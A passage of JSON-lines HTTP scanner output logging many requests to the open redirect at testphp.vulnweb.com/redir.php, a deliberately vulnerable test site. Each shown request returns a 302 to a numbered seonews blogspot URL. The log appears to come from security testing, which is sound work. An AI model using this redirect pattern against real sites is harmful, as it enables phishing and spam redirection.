de\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:31:27.216554701Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1677.blogspot.com/management.html\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1677.blogspot.com/management.html\",\"location\":\"http://seonews1677.blogspot.com/management.html\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://seonews1677.blogspot.com/management.html\",\"time\":\"344.755791ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:31:27.224156972Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1679.blogspot.com/management.html\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1679.blogspot.com/management.html\",\"location\":\"http://seonews1679.blogspot.com/management.html\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://seonews1679.blogspot.com/management.html\",\"time\":\"352.659748ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:31:27.300661662Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1680.blogspot.com/management.html\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1680.blogspot.com/management.html\",\"location\":\"http://seonews1680.blogspot.com/management.html\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://seonews1680.blogspot.com/management.html\",\"time\":\"351.678606ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:31:27.328227573Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1681.blogspot.com/\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1681.blogspot.com/\",\"location\":\"http://seonews1681.blogspot.com/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://seonews1681.blogspot.com/\",\"time\":\"342.63931ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:31:27.364691879Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1682.blogspot.com/\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1682.blogspot.com/\",\"location\":\"http://seonews1682.blogspot.com/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://seonews1682.blogspot.com/\",\"time\":\"352.341711ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:31:27.457431404Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1683.blogspot.com/\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1683.blogspot.com/\",\"location\":\"http://seonews1683.blogspot.com/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://seonews1683.blogspot.com/\",\"time\":\"343.692602ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:31:27.508200962Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1683.blogspot.com/management.html\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1683.blogspot.com/management.html\",\"location\":\"http://seonews1683.blogspot.com/management.html\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://seonews1683.blogspot.com/management.html\",\"time\":\"352.2524ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:31:27.539033967Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1684.blogspot.com/\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1684.blogspot.com/\",\"location\":\"http://seonews1684.blogspot.com/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://seonews1684.blogspot.com/\",\"time\":\"347.820009ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:31:27.615023361Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1684.blogspot.com/management.html\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1684.blogspot.com/management.html\",\"location\":\"http://seonews1684.blogspot.com/management.html\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://seonews1684.blogspot.com/management.html\",\"time\":\"352.108299ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:31:27.716957659Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1687.blogspot.com/\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1687.blogspot.com/\",\"location\":\"http://seonews1687.blogspot.com/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://seonews1687.blogspot.com/\",\"time\":\"354.966151ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:31:27.7764488Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1688.blogspot.com/\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1688.blogspot.com/\",\"location\":\"http://seonews1688.blogspot.com/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://seonews1688.blogspot.com/\",\"time\":\"346.787941ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:31:27.877923114Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1688.blogspot.com/management.html\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1688.blogspot.com/management.html\",\"location\":\"http://seonews1688.blogspot.com/management.html\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://seonews1688.blogspot.com/management.html\",\"time\":\"351.240121ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:31:31.032021466Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1689.blogspot.com/\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1689.blogspot.com/\",\"location\":\"http://seonews1689.blogspot.com/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://seonews1689.blogspot.com/\",\"time\":\"356.343964ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:31:31.255142784Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1689.blogspot.com/management.html\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1689.blogspot.com/management.html\",\"location\":\"http://seonews1689.blogspot.com/management.html\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://seonews1689.blogspot.com/management.html\",\"time\":\"342.134357ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:31:31.28262907Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1690.blogspot.com/\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1690.blogspot.com/\",\"location\":\"http://seonews1690.blogspot.com/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://seonews1690.blogspot.com/\",\"time\":\"348.503237ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:31:31.332481665Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1690.blogspot.com/management.html\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1690.blogspot.com/management.html\",\"location\":\"http://seonews1690.blogspot.com/management.html\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://seonews1690.blogspot.com/management.html\",\"time\":\"346.386001ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:31:31.751459465Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1691.blogspot.com/management.html\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1691.blogspot.com/management.html\",\"location\":\"http://seonews1691.blogspot.com/management.html\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://seonews1691.blogspot.com/management.html\",\"time\":\"350.917175ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:31:32.145375077Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1692.blogspot.com/\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1692.blogspot.com/\",\"location\":\"http://seonews1692.blogspot.com/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://seonews1692.blogspot.com/\",\"time\":\"347.363747ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:31:32.180820479Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1692.blogspot.com/management.html\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1692.blogspot.com/management.html\",\"location\":\"http://seonews1692.blogspot.com/management.html\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://seonews1692.blogspot.com/management.html\",\"time\":\"347.982862ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:31:32.399995356Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1693.blogspot.com/management.html\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1693.blogspot.com/management.html\",\"location\":\"http://seonews1693.blogspot.com/management.html\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://seonews1693.blogspot.com/management.html\",\"time\":\"355.805278ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:31:32.892748458Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1694.blogspot.com/\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1694.blogspot.com/\",\"location\":\"http://seonews1694.blogspot.com/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://seonews1694.blogspot.com/\",\"time\":\"343.643054ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:31:32.949768134Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1694.blogspot.com/management.html\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1694.blogspot.com/management.html\",\"location\":\"http://seonews1694.blogspot.com/management.html\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://seonews1694.blogspot.com/management.html\",\"time\":\"356.322663ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:31:34.65998254Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1696.blogspot.com/\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1696.blogspot.com/\",\"location\":\"http://seonews1696.blogspot.com/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://seonews1696.blogspot.com/\",\"time\":\"347.725264ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:31:35.928021976Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1696.blogspot.com/management.html\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1696.blogspot.com/management.html\",\"location\":\"http://seonews1696.blogspot.com/management.html\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://seonews1696.blogspot.com/management.html\",\"time\":\"352.257262ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:31:35.965065467Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1697.blogspot.com/management.html\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1697.blogspot.com/management.html\",\"location\":\"http://seonews1697.blogspot.com/management.html\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://seonews1697.blogspot.com/management.html\",\"time\":\"348.348834ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:31:36.311684009Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1698.blogspot.com/management.html\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1698.blogspot.com/management.html\",\"location\":\"http://seonews1698.blogspot.com/management.html\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://seonews1698.blogspot.com/management.html\",\"time\":\"352.430386ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:31:37.150710396Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1699.blogspot.com/management.html\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1699.blogspot.com/management.html\",\"location\":\"http://seonews1699.blogspot.com/management.html\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://seonews1699.blogspot.com/management.html\",\"time\":\"352.705114ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:31:37.183500274Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1700.blogspot.com/management.html\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1700.blogspot.com/management.html\",\"location\":\"http://seonews1700.blogspot.com/management.html\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://seonews1700.blogspot.com/management.html\",\"time\":\"351.607684ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:31:37.210647364Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1701.blogspot.com/\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1701.blogspot.com/\",\"location\":\"http://seonews1701.blogspot.com/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://seonews1701.blogspot.com/\",\"time\":\"353.137216ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:31:37.221661551Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1701.blogspot.com/management.html\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1701.blogspot.com/management.html\",\"location\":\"http://seonews1701.blogspot.com/management.html\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://seonews1701.blogspot.com/management.html\",\"time\":\"353.893382ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:31:37.56579661Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1703.blogspot.com/management.html\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1703.blogspot.com/management.html\",\"location\":\"http://seonews1703.blogspot.com/management.html\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://seonews1703.blogspot.com/management.html\",\"time\":\"339.428256ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:31:37.56739884Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1703.blogspot.com/\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1703.blogspot.com/\",\"location\":\"http://seonews1703.blogspot.com/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://seonews1703.blogspot.com/\",\"time\":\"348.831719ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:31:37.647260795Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1704.blogspot.com/\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1704.blogspot.com/\",\"location\":\"http://seonews1704.blogspot.com/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://seonews1704.blogspot.com/\",\"time\":\"344.528499ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:31:37.670987917Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1706.blogspot.com/\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1706.blogspot.com/\",\"location\":\"http://seonews1706.blogspot.com/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://seonews1706.blogspot.com/\",\"time\":\"341.171015ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:31:37.708488368Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1707.blogspot.com/\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1707.blogspot.com/\",\"location\":\"http://seonews1707.blogspot.com/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://seonews1707.blogspot.com/\",\"time\":\"342.589109ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:31:37.810999441Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1707.blogspot.com/management.html\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1707.blogspot.com/management.html\",\"location\":\"http://seonews1707.blogspot.com/management.html\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://seonews1707.blogspot.com/management.html\",\"time\":\"352.049853ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:31:37.856050072Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1708.blogspot.com/management.html\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1708.blogspot.com/